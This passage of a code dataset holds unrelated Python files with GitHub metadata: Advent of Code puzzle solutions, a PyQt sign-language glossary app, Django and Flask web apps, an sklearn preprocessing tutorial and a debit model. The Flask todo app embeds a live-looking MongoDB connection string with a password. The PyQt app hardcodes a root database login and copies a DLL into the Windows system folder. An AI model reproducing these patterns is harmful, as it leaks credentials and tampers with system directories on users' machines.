query, bool)\n\n\ndef filter_int(n: Node, query: str) -> int:\n \"\"\"\n Filter and ensure that the returned value is of type int.\n \"\"\"\n return _scalariter2item(n, query, int)\n\n\ndef filter_float(n: Node, query: str) -> float:\n \"\"\"\n Filter and ensure that the returned value is of type int.\n \"\"\"\n return _scalariter2item(n, query, float)\n\n\nfilter_number = filter_float\n","repo_name":"bblfsh/python-client","sub_path":"bblfsh/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":10367,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"153018056","text":"import re\nlines = list(map(lambda l:l.strip(), open(\"/dev/stdin\")))\n\nfields = dict()\nrate = 0\ntickets = []\nall_ranges = []\nfor line in lines:\n\tm = re.match(r\"(.+)\\: (\\d+)-(\\d+) or (\\d+)-(\\d+)\", line)\n\tif m:\n\t\tl1, r1 = int(m[2]), int(m[3])\n\t\tl2, r2 = int(m[4]), int(m[5])\n\t\tfields[m[1]] = [(l1,r1), (l2,r2)]\n\t\tall_ranges += [(l1,r1), (l2,r2)]\n\telif line == \"your ticket:\":\n\t\tvalids = [set(fields.keys()) for i in range(len(fields))]\n\t\tmode=\"your\"\n\telif line == \"nearby tickets:\":\n\t\tmode=\"nearby\"\n\telif line == \"\":\n\t\tpass\n\telse:\n\t\tif mode == \"your\":\n\t\t\tmyticket = (list(map(int, line.split(\",\"))))\n\t\t\n\t\tvalid_ticket = True\n\t\tfor i,x in enumerate(line.split(\",\")):\n\t\t\tx = int(x)\n\n\t\t\tok = False\n\t\t\tfor l,r in all_ranges:\n\t\t\t\tif l <= x <= r:\n\t\t\t\t\tok = True\n\t\t\t\t\tbreak\n\t\t\tif not ok:\n\t\t\t\tvalid_ticket = False\n\n\t\tif not valid_ticket:\n\t\t\tcontinue\n\n\t\tfor i,x in enumerate(line.split(\",\")):\n\t\t\tx = int(x)\n\t\t\tfor name,ranges in fields.items():\n\t\t\t\tif name not in valids[i]:\n\t\t\t\t\tcontinue\n\t\t\t\tok = False\n\t\t\t\tfor l,r in ranges:\n\t\t\t\t\tif l <= x <= r:\n\t\t\t\t\t\tok = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not ok:\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprint(f\"{i} remove {name} ({x} not in {ranges})\")\n\t\t\t\t\tvalids[i].remove(name)\n\nunsolved = set(range(len(valids)))\nsolved = set()\nfieldmap = dict()\nwhile len(unsolved) > 0:\n\tfor i in unsolved:\n\t\tvalids[i] = valids[i] - solved\n\t\tif len(valids[i]) == 1:\n\t\t\tsol, = 
valids[i]\n\t\t\tunsolved.remove(i)\n\t\t\tsolved.add(sol)\n\t\t\tfieldmap[sol] = i\n\t\t\tbreak\nprint(fieldmap)\nret = 1\nfor field,pos in fieldmap.items():\n\tif field.startswith(\"departure\"):\n\t\tret *= myticket[pos]\nprint(ret)","repo_name":"taavirepan/adventofcode2020","sub_path":"16/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14699042420","text":"import addn1 as A\r\ndef call(n1):\r\n i=1\r\n data = []\r\n \r\n while(i<=n1):\r\n print(\"Enter the number:\")\r\n num = int(input())\r\n i = i+1\r\n data.append(num)\r\n print(data)\r\n \r\n max1 = 0\r\n for i in range(0,len(data)):\r\n if ( data[i] > max1):\r\n max1 = data[i]\r\n #return max1\r\n print(\"Maximum number is:\",max1)\r\n \r\n \r\ndef main():\r\n \r\n print(\"Enter the how many numbers you want:\")\r\n n = int(input())\r\n call(n)\r\n \r\nif __name__==\"__main__\":\r\n\tmain()","repo_name":"PrachiBorawake/Python_codes","sub_path":"Assignment3_2.py","file_name":"Assignment3_2.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9188491338","text":"from cryptography.fernet import Fernet\n\nmsg = input(\"Inserisci il messaggio da decriptare: \")\nchiave = input(\"Inserisci la chiave di crittografia: \")\n\n\nmes_crypt = Fernet(chiave).decrypt(bytes(msg, \"UTF_8\"))\n\nwith open(\"messaggio_decriptato.txt\", \"wb\") as f:\n f.write(mes_crypt)\n f.close","repo_name":"mattiabosetti/crypt-message","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14048503578","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 10 19:08:54 2018\r\n\r\n@author: laris\r\n\"\"\"\r\nfrom PyQt5.QtWidgets import QDialog, QLayout\r\nfrom PyQt5 import QtGui\r\nfrom PyQt5.uic import loadUi\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5 import QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport sys, tela, glossario, os, zipfile, cadastrar_disciplina, pymysql, tela_sobre, subprocess, platform, shutil, webbrowser\r\n\r\n\r\nclass TelaInicial(QDialog):\r\n def __init__(self):\r\n super(TelaInicial, self).__init__()\r\n #super(GuiLibras, self)\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(path)\r\n #print(os.path.join(os.getcwd()))\r\n self.ui = loadUi(os.path.join(os.getcwd(), r'tela_inicial.ui'), self)\r\n \r\n #if self.ui.btnIniciar.isChecked():\r\n self.scrollArea.hide()\r\n self.init_components()\r\n self.get_user_path()\r\n self.check_disc()\r\n self.components_scroll()\r\n d = self.get_disc()\r\n #[0].clicked.connect(lambda:self.set_disc(d))\r\n self.ui.btnIniciar.clicked.connect(lambda:open(d))\r\n self.ui.btnCadastrar.clicked.connect(open_disc)\r\n self.btnDisc.clicked.connect(lambda:self.validacao())\r\n # self.ui.btn1.clicked.connect(open_sobre)\r\n self.ui.pushButton.clicked.connect(self.open_chm)\r\n self.get_system\r\n\r\n \r\n def get_system():\r\n if(platform.architecture()[0] == '32bit'):\r\n source = r'C:\\Users\\assuncao\\Desktop\\glossario- windows\\api-ms-win-downlevel-shlwapi-l1-1-0.dll'\r\n destination = r'C:\\Windows\\System32'\r\n\r\n shutil.move(source, destination)\r\n \r\n def get_user_path(self):\r\n user_path = os.path.expanduser('~')\r\n self.final_path = 
os.path.join(user_path, 'LIBRAS')\r\n if(os.path.isdir(self.final_path)):\r\n print('dir já existe')\r\n os.chdir(self.final_path)\r\n else:\r\n os.mkdir(self.final_path)\r\n fantasy_zip = zipfile.ZipFile('disciplina.zip')\r\n #extrai toda a estrutura de arquivos para a nova pasta criada\r\n fantasy_zip.extractall(self.final_path)\r\n os.chdir(self.final_path)\r\n fantasy_zip.close() \r\n def escolha_disc(disc):\r\n path_disc = os.path.join(os.getcwd(), disc)\r\n os.chdir(path_disc)\r\n def mostrar_disc(self): \r\n for k, v in self.lista_disc.items():\r\n btnDisc = QtWidgets.QPushButton(v)\r\n #print(btn.text())\r\n btnDisc.setFixedHeight(51)\r\n btnDisc.setCheckable(True)\r\n btnDisc.setFixedWidth(107)\r\n # btn.setObjectName(k)\r\n btnDisc.isFlat()\r\n btnDisc.setStyleSheet(\"\"\"QPushButton{ border: thin; background : rgb(177, 178, 181); border-radius : 2px;\r\n\t-moz-border-radius : 6px;\r\n\t-webkit-border-radius : 6px ;} QPushButton:checked{background-color: rgb(163, 164, 168)}\"\"\")\r\n btnDisc.setFocusPolicy(QtCore.Qt.StrongFocus)\r\n \r\n self.vbox.addWidget(btnDisc)\r\n def get_disciplinas(self, disc):\r\n connection = pymysql.connect(host='localhost',\r\n user='root',\r\n password='root',\r\n port = 3306, \r\n db='librasdb',\r\n charset='latin1',\r\n cursorclass=pymysql.cursors.DictCursor)\r\n \r\n cursor = connection.cursor()\r\n\r\n cursor.execute(\"SELECT discdescricao, discdir FROM disciplina WHERE discdir = %s\", (disc))\r\n result = cursor.fetchall() #retorna a linh\r\n self.lista_disc = {}\r\n for row in result:\r\n self.lista_disc[row.get('discdir')] = row.get('discdescricao') \r\n \r\n connection.close() #fecha a conexão\r\n def validacao(self):\r\n if self.btnDisc.isChecked():\r\n self.scrollArea.show()\r\n else:\r\n self.scrollArea.hide()\r\n def check_disc(self):\r\n path_disc = os.path.join(self.final_path, 'disciplina')\r\n tam = len(path_disc)\r\n lista = [f.path for f in os.scandir(path_disc) if f.is_dir() ]\r\n for i in lista:\r\n if os.path.exists(i) and os.path.isdir(i):\r\n if not os.listdir(i):\r\n print(\"Directory is empty\")\r\n else: \r\n disc = i[tam+1:]\r\n self.get_disciplinas(disc)\r\n else:\r\n print(\"Given Directory don't exists\")\r\n def components_scroll(self):\r\n self.vbox = QtWidgets.QVBoxLayout()\r\n self.mostrar_disc()\r\n self.btnCadastrar = QtWidgets.QPushButton('Adicionar')\r\n pm = QtGui.QPixmap(r'btn-disciplina.png')\r\n icon = QIcon(pm)\r\n self.btnCadastrar.setFixedHeight(51)\r\n self.btnCadastrar.setCheckable(True)\r\n self.btnCadastrar.setFixedWidth(107)\r\n self.btnCadastrar.setStyleSheet(\"\"\"QPushButton{ border: thin; background : rgb(177, 178, 181); border-radius : 2px;\r\n\t-moz-border-radius : 6px;\r\n\t-webkit-border-radius : 6px ;} QPushButton:checked{background-color: rgb(163, 164, 168)}\"\"\")\r\n self.btnCadastrar.setIcon(icon)\r\n self.btnCadastrar.setIconSize(QtCore.QSize(40,40))\r\n self.vbox.addWidget(self.btnCadastrar)\r\n self.vbox.setSizeConstraint(QLayout.SetFixedSize)\r\n self.conteudo.setLayout(self.vbox)\r\n self.ui.scrollArea.setStyleSheet(\"border: none;\")\r\n def get_disc(self):\r\n self.lista_botoes = self.conteudo.findChildren(QtWidgets.QPushButton) \r\n self.t = tuple(self.lista_botoes)\r\n \r\n for k, v in self.lista_disc.items(): \r\n if v == self.t[0].text():\r\n d = k\r\n return d \r\n\r\n \r\n def init_components(self):\r\n pixmap = QtGui.QPixmap(r'barra-lateral-04.png')\r\n self.ui.barraLateral.setPixmap(pixmap)\r\n #botao help\r\n pmHelp = QtGui.QPixmap(r'botao-lateral-1-14.png')\r\n icon = 
QIcon(pmHelp)\r\n self.ui.pushButton.setIcon(icon)\r\n self.ui.pushButton.setIconSize(QtCore.QSize(64,64))\r\n self.ui.pushButton.setToolTip(\"Ajuda\")\r\n \r\n \r\n pm = QtGui.QPixmap(r'logo-tela-inicial-13.png')\r\n self.ui.label.setPixmap(pm)\r\n \r\n pm2 = QtGui.QPixmap(r'instrucao-inicial.png')\r\n self.ui.labelMsg.setPixmap(pm2)\r\n self.ui.labelMsg.setScaledContents(True)\r\n \r\n pmIniciar = QtGui.QPixmap(r'botao-iniciar-10.png')\r\n icon = QIcon(pmIniciar)\r\n self.ui.btnIniciar.setIcon(icon)\r\n self.ui.btnIniciar.setIconSize(QtCore.QSize(100,80))\r\n \r\n \r\n# pm1 = QtGui.QPixmap(r'C:\\Users\\laris\\Desktop\\dist_funfanod\\btn-1.png')\r\n# icon = QIcon(pm1)\r\n# self.ui.btn1.setIcon(icon)\r\n# self.ui.btn1.setIconSize(QtCore.QSize(67,67))\r\n# self.ui.btn1.setToolTip(\"Sobre\")\r\n \r\n pmDisc = QtGui.QPixmap(r'btn-disciplina.png')\r\n icon = QIcon(pmDisc)\r\n self.ui.btnDisc.setIcon(icon)\r\n self.ui.btnDisc.setIconSize(QtCore.QSize(64,64))\r\n self.ui.btnDisc.setToolTip(\"Disciplina\")\r\n \r\n def open_chm(self):\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(path)\r\n webbrowser.open_new(os.path.join(r'manual.pdf'))\r\n \r\ndef open_disc(self):\r\n if __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app2=QtCore.QCoreApplication.instance()\r\n if app2 is None:\r\n app2 = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n window2=cadastrar_disciplina.CadastrarDisciplina()\r\n window2.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n # window.setFixedSize(window.size())\r\n window2.show()\r\n #sys.exit(app2.exec_())\r\n#def open_sobre(self):\r\n## if __name__=='__main__':\r\n## #app = QtCore.QCoreApplication.instance()\r\n## app=QtCore.QCoreApplication.instance()\r\n## if app is None:\r\n## app = QApplication(sys.argv)\r\n# # app=QApplication(sys.argv)\r\n# window=tela_sobre.TelaSobre()\r\n# window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n# window.setFixedSize(window.size())\r\n# window.show()\r\n # sys.exit(app.exec_())\r\n \r\ndef open(disc):\r\n # d = self.t[0].clicked.connect(lambda:self.get_disc())\r\n \r\n if __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app=QtCore.QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n# print(self.disc_escolhida)\r\n #disc = 'BD' \r\n window=glossario.GuiLibras(disc)\r\n window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n \r\n window.show()\r\n # self.h ide()\r\n\r\n #sys.exit(app.exec_())\r\n \r\n\r\n \r\nif __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app=QtCore.QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n window=TelaInicial()\r\n window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n window.setFixedSize(window.size())\r\n window.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"menezeslarissa/glossario_libras","sub_path":"Glossário de Libras - Linux (64 Bits)/Glossário de Libras/tela_inicial.py","file_name":"tela_inicial.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10848893746","text":"\"\"\"kino URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path\nfrom app import views;\nfrom django.contrib.auth.views import LoginView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('hello/',views.home),\n path('create/',views.createData),\n path('welcometemp/',views.welcome),\n path('projections/',views.projections,name='projections'),\n path('login/',LoginView.as_view(template_name='login.html'), name='login'),\n path('register/',views.register,name = 'register'),\n path('logout/',views.logoutView,name='logout'),\n path('projections/create/',views.createProjection,name='create'),\n path('projections/update/',views.updateProjection,name='update'),\n path('projections/delete/',views.deleteProjection,name='delete'),\n path('obrana/', views.obrana, name='obrana')\n \n]\n","repo_name":"martinictin/DjangoWeb","sub_path":"vjezba7/kino/kino/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70124477129","text":"from collections import deque\nfrom dataclasses import dataclass, field\nfrom pprint import pprint\nfrom typing import List\n\n\n@dataclass\nclass GraphNode:\n name: str\n neighbors: List['GraphNode'] = field(default_factory=lambda: [])\n\n @property\n def small(self):\n return self.name.islower()\n\n\ndef load_nodes():\n with open('input.txt', 'r') as f:\n lines: List[str] = f.readlines()\n nodes = {\n 'start': GraphNode('start'),\n 'end': GraphNode('end'),\n }\n for line in lines:\n from_, to = line.strip().split('-')\n if from_ not in nodes:\n nodes[from_] = GraphNode(from_)\n if to not in nodes:\n nodes[to] = GraphNode(to)\n nodes[from_].neighbors.append(nodes[to])\n nodes[to].neighbors.append(nodes[from_])\n return nodes\n\n\ndef part1():\n nodes = load_nodes()\n stack = deque([(nodes['start'], ['start'])])\n paths = []\n while len(stack) != 0:\n node, path = stack.pop()\n if node.name == 'end':\n paths.append(path)\n continue\n for neighbor in node.neighbors:\n if (neighbor.small and neighbor.name not in path) or not neighbor.small:\n stack.appendleft((neighbor, path + [neighbor.name]))\n print(len(paths))\n\n\ndef part2():\n nodes = load_nodes()\n stack = deque([(nodes['start'], ['start'], False)])\n paths = 0\n while len(stack) != 0:\n node, path, small = stack.pop()\n for neighbor in node.neighbors:\n if neighbor.name == 'end':\n paths += 1\n continue\n if (neighbor.small and neighbor.name not in path) or not neighbor.small:\n stack.appendleft((neighbor, path + [neighbor.name], small))\n elif neighbor.small and neighbor.name in path and not small and neighbor.name != 'start':\n stack.appendleft((neighbor, path + [neighbor.name], True))\n print(paths)\n\n\nif __name__ == '__main__':\n part1()\n part2()\n","repo_name":"AsiPanda/AventOfCode2021","sub_path":"day12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5779750145","text":"from flask import Flask, render_template, redirect, url_for,request\nfrom flask_pymongo import 
PyMongo\nfrom bson.objectid import ObjectId\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb+srv://masterDB:qwerty123@cluster0.1efsd.mongodb.net/simpleTodoApp?retryWrites=false&w=majority\"\nmongo = PyMongo(app)\ntodos = mongo.db.todos\n\n@app.route(\"/\")\ndef index():\n saved_todos = todos.find()\n return render_template(\"index.html\", todos=saved_todos)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add_todo():\n new_todo = request.form.get('new-todo')\n todos.insert_one({'task':new_todo, 'completed':False})\n return redirect(url_for('index'))\n\n@app.route(\"/complete/\")\ndef complete(oid):\n todo = todos.update_one({'_id': ObjectId(oid)}, {'$set':{'completed':True}})\n return redirect(url_for('index'))\n\n@app.route(\"/delete-completed\")\ndef deleteCompleted():\n deleted = todos.delete_many({'completed':True})\n return redirect(url_for('index'))\n\n@app.route(\"/delete-all\")\ndef deleteAll():\n deleted = todos.delete_many({})\n return redirect(url_for('index'))\n\n@app.route(\"/delete/\")\ndef deleteSelected(oid):\n deleted = todos.delete_one({'_id':ObjectId(oid)})\n return redirect(url_for('index'))","repo_name":"aesavas/simpleTodoApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70567603527","text":"# -*- coding: utf-8 -*-\n\"\"\"2.5 데이터_전처리.ipynb\n\n### 데이터 인코딩\n\n* 레이블 인코딩(Label encoding)\n\"\"\"\n\nfrom sklearn.preprocessing import LabelEncoder\n\nitems=['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서']\n\n# LabelEncoder를 객체로 생성한 후 , fit( ) 과 transform( ) 으로 label 인코딩 수행. \nencoder = LabelEncoder()\nencoder.fit(items)\nlabels = encoder.transform(items)\nprint('인코딩 변환값:',labels)\n\nprint('인코딩 클래스:',encoder.classes_)\n\nprint('디코딩 원본 값:',encoder.inverse_transform([4, 5, 2, 0, 1, 1, 3, 3]))\n\n\"\"\"* 원-핫 인코딩(One-Hot encoding)\"\"\"\n\nfrom sklearn.preprocessing import OneHotEncoder\nimport numpy as np\n\nitems=['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서']\n\n# 2차원 ndarray로 변환합니다. \nitems = np.array(items).reshape(-1, 1)\n\n# 원-핫 인코딩을 적용합니다. \noh_encoder = OneHotEncoder()\noh_encoder.fit(items)\noh_labels = oh_encoder.transform(items)\n\n# OneHotEncoder로 변환한 결과는 희소행렬(Sparse Matrix)이므로 toarray()를 이용하여 밀집 행렬(Dense Matrix)로 변환. \nprint('원-핫 인코딩 데이터')\nprint(oh_labels.toarray())\nprint('원-핫 인코딩 데이터 차원')\nprint(oh_labels.shape)\n\nimport pandas as pd\n\n# 원-핫 인코딩 더 쉽게 하는 방법 : get_dummies\ndf = pd.DataFrame({'item':['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서'] })\npd.get_dummies(df)\n\n\"\"\"### 피처 스케일링과 정규화\n\n* StandardScaler\n\"\"\"\n\nfrom sklearn.datasets import load_iris\nimport pandas as pd\n# 붓꽃 데이터 셋을 로딩하고 DataFrame으로 변환합니다. \niris = load_iris()\niris_data = iris.data\niris_df = pd.DataFrame(data=iris_data, columns=iris.feature_names)\n\nprint('feature 들의 평균 값')\nprint(iris_df.mean())\nprint('\\nfeature 들의 분산 값')\nprint(iris_df.var())\n\nfrom sklearn.preprocessing import StandardScaler\n\n# StandardScaler객체 생성\nscaler = StandardScaler()\n# StandardScaler 로 데이터 셋 변환. fit( ) 과 transform( ) 호출. 
\nscaler.fit(iris_df)\niris_scaled = scaler.transform(iris_df)\n\n#transform( )시 scale 변환된 데이터 셋이 numpy ndarry로 반환되어 이를 DataFrame으로 변환\niris_df_scaled = pd.DataFrame(data=iris_scaled, columns=iris.feature_names)\nprint('feature 들의 평균 값')\nprint(iris_df_scaled.mean())\nprint('\\nfeature 들의 분산 값')\nprint(iris_df_scaled.var())\n\n\"\"\"* MinMaxScaler\"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\n\n# MinMaxScaler객체 생성\nscaler = MinMaxScaler()\n# MinMaxScaler 로 데이터 셋 변환. fit() 과 transform() 호출. \nscaler.fit(iris_df)\niris_scaled = scaler.transform(iris_df)\n\n# transform()시 scale 변환된 데이터 셋이 numpy ndarry로 반환되어 이를 DataFrame으로 변환\niris_df_scaled = pd.DataFrame(data=iris_scaled, columns=iris.feature_names)\nprint('feature들의 최소 값')\nprint(iris_df_scaled.min())\nprint('\\nfeature들의 최대 값')\nprint(iris_df_scaled.max())\n\n\"\"\"* Scaler를 이용하여 학습 데이터와 테스트 데이터에 fit(), transform(), fit_transform() 적용 시 유의사항. \"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\n\n# 학습 데이터는 0 부터 10까지, 테스트 데이터는 0 부터 5까지 값을 가지는 데이터 세트로 생성\n# Scaler클래스의 fit(), transform()은 2차원 이상 데이터만 가능하므로 reshape(-1, 1)로 차원 변경\ntrain_array = np.arange(0, 11).reshape(-1, 1)\ntest_array = np.arange(0, 6).reshape(-1, 1)\n\n# 최소값 0, 최대값 1로 변환하는 MinMaxScaler객체 생성\nscaler = MinMaxScaler()\n# fit()하게 되면 train_array 데이터의 최소값이 0, 최대값이 10으로 설정. \nscaler.fit(train_array)\n# 1/10 scale로 train_array 데이터 변환함. 원본 10-> 1로 변환됨.\ntrain_scaled = scaler.transform(train_array)\n \nprint('원본 train_array 데이터:', np.round(train_array.reshape(-1), 2))\nprint('Scale된 train_array 데이터:', np.round(train_scaled.reshape(-1), 2))\n\n# 앞에서 생성한 MinMaxScaler에 test_array를 fit()하게 되면 원본 데이터의 최소값이 0, 최대값이 5으로 설정됨 \nscaler.fit(test_array)\n# 1/5 scale로 test_array 데이터 변환함. 원본 5->1로 변환. \ntest_scaled = scaler.transform(test_array)\n# train_array 변환 출력\nprint('원본 test_array 데이터:', np.round(test_array.reshape(-1), 2))\nprint('Scale된 test_array 데이터:', np.round(test_scaled.reshape(-1), 2))\n\nscaler = MinMaxScaler()\nscaler.fit(train_array)\ntrain_scaled = scaler.transform(train_array)\nprint('원본 train_array 데이터:', np.round(train_array.reshape(-1), 2))\nprint('Scale된 train_array 데이터:', np.round(train_scaled.reshape(-1), 2))\n\n# test_array에 Scale 변환을 할 때는 반드시 fit()을 호출하지 않고 transform() 만으로 변환해야 함. 
\ntest_scaled = scaler.transform(test_array)\nprint('\\n원본 test_array 데이터:', np.round(test_array.reshape(-1), 2))\nprint('Scale된 test_array 데이터:', np.round(test_scaled.reshape(-1), 2))\n","repo_name":"yerinsally/machine_learning_perfect_guide","sub_path":"py/02_5_data_preprocessing.py","file_name":"02_5_data_preprocessing.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40833339206","text":"import reversion\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom maguire.models import AppModel\n\nfrom events.models import Event\n\n\n@reversion.register()\nclass Debit(AppModel):\n \"\"\"\n Debit Model\n \"\"\"\n STATUS_CHOICES = (\n (\"pending\", \"Pending\"),\n (\"processing\", \"Processing\"),\n (\"loaded\", \"Loaded\"),\n (\"successful\", \"Successful\"),\n (\"failed\", \"Failed\"),\n )\n ACCOUNT_TYPE_CHOICES = (\n (\"savings\", \"Savings\"),\n (\"current\", \"Current\"),\n )\n # Optional Identifing information\n client = models.CharField(\n max_length=50,\n verbose_name=_(\"Client\"),\n help_text=_(\"Client identifier (UUID, number, reference, etc.) from your system\"),\n null=True, blank=True\n )\n downstream_reference = models.CharField(\n max_length=50,\n verbose_name=_(\"Reference\"),\n unique=True,\n help_text=_(\"Payment reference (UUID, number, reference, etc.) from your system. \"\n \"This must either be None or should be unique to prevent duplication\"),\n null=True, blank=True\n )\n callback_url = models.CharField(\n max_length=500,\n verbose_name=_(\"Callback URL\"),\n help_text=_(\"URL to callback when debit moves to successful or failed\"),\n null=True, blank=True\n )\n # Banking details\n account_name = models.CharField(\n max_length=60,\n verbose_name=_(\"Account Name\"),\n help_text=_(\"Bank account holder's name, unvalidated\")\n )\n account_number = models.CharField(\n max_length=15,\n help_text=_(\"Bank account Number\"))\n branch_code = models.CharField(max_length=6)\n account_type = models.CharField(\n choices=ACCOUNT_TYPE_CHOICES, max_length=30,\n null=True, blank=True)\n # Debit details\n status = models.CharField(\n choices=STATUS_CHOICES, max_length=30,\n default=\"pending\")\n amount = models.DecimalField(\n max_digits=10, decimal_places=2)\n reference = models.CharField(\n null=True, blank=True,\n max_length=9,\n verbose_name=_(\"Debit Reference\"),\n help_text=_(\"Unique 9 digit validated debit reference, provider agnostic\"))\n provider = models.CharField(\n max_length=50,\n verbose_name=_(\"Provider\"),\n help_text=_(\"Upstream Debit provider, set by provider module\"),\n null=True, blank=True\n )\n provider_reference = models.CharField(\n max_length=200,\n verbose_name=_(\"Provider Reference\"),\n help_text=_(\"Upstream Debit provider reference for lookups\"),\n null=True, blank=True\n )\n provider_status = models.CharField(\n max_length=200,\n verbose_name=_(\"Provider Status\"),\n help_text=_(\"Upstream Debit provider status for error/success checks\"),\n null=True, blank=True\n )\n scheduled_at = models.DateTimeField(\n verbose_name=_(\"Scheduled at\"),\n help_text=_(\"Date and time after which pending debits will be loaded\"),\n null=True, blank=True)\n loaded_at = 
models.DateTimeField(\n verbose_name=_(\"Loaded at\"),\n help_text=_(\"Date and time that debit was loaded to provider\"),\n null=True, blank=True)\n load_attempts = models.IntegerField(\n default=0,\n verbose_name=_(\"Load Attempts\"),\n help_text=_(\"Number of times maguire has attmepted to load the debit\"))\n last_error = models.TextField(\n verbose_name=_(\"Last Error\"),\n help_text=_(\"The error message received on the last attempt to load the debit\"),\n null=True, blank=True)\n created_by = models.ForeignKey(\n User, related_name='debits_created', null=True, blank=True,\n on_delete=models.CASCADE)\n updated_by = models.ForeignKey(\n User, related_name='debits_updated', null=True, blank=True,\n on_delete=models.CASCADE)\n\n @property\n def node_id(self):\n from maguire.utils import b64_from_uuid\n return b64_from_uuid(self.id, \"DebitNode\").decode(\"utf-8\")\n\n def as_json(self):\n \"\"\"\n Prepares this Debit for JSON serialization\n \"\"\"\n return {\n 'id': str(self.id),\n 'client': self.client,\n 'downstream_reference': self.downstream_reference,\n 'callback_url': self.callback_url,\n 'account_name': self.account_name,\n 'account_number': self.account_number,\n 'branch_code': self.branch_code,\n 'account_type': self.account_type,\n 'status': self.status,\n 'amount': str(self.amount),\n 'reference': self.reference,\n 'provider': self.provider,\n 'provider_reference': self.provider_reference,\n 'provider_status': self.provider_status,\n 'scheduled_at': self.scheduled_at.isoformat() if self.loaded_at else None,\n 'loaded_at': self.loaded_at.isoformat() if self.loaded_at else None,\n 'load_attempts': self.load_attempts,\n 'last_error': self.last_error,\n 'created_at': self.created_at.isoformat(),\n 'created_by': self.created_by.id if self.created_by else None,\n 'updated_at': self.updated_at.isoformat(),\n 'updated_by': self.updated_by.id if self.updated_by else None,\n }\n\n def save(self, *args, **kwargs):\n if self.reference is None:\n self.reference = generate_unique_debit_reference(length=9)\n super(Debit, self).save(*args, **kwargs)\n\n def __str__(self):\n return str(self.id)\n\n\n@receiver(post_save, sender=Debit)\ndef create_event_debit(sender, instance, created, **kwargs):\n \"\"\" Post save hook that creates a model.created Event\n \"\"\"\n if created:\n source_model = ContentType.objects.get(app_label='debits', model='debit')\n Event.objects.create(**{\n \"source_model\": source_model,\n \"source_id\": instance.id,\n \"event_at\": timezone.now(),\n \"event_type\": \"model.created\",\n \"event_data\": instance.as_json(),\n \"created_by\": instance.created_by\n })\n\n\ndef generate_unique_debit_reference(length=9, attempts=0):\n from maguire.utils import random_digits, calculate_luhn\n\n source = random_digits(length-1)\n checksum = calculate_luhn(source)\n unique_reference = str(source) + str(checksum)\n\n try:\n Debit.objects.get(reference=unique_reference)\n if attempts < 10:\n generate_unique_debit_reference(length=length, attempts=attempts+1)\n else:\n return \"Aborting unique_reference generation after 10 failed attempts\"\n except Debit.DoesNotExist:\n return 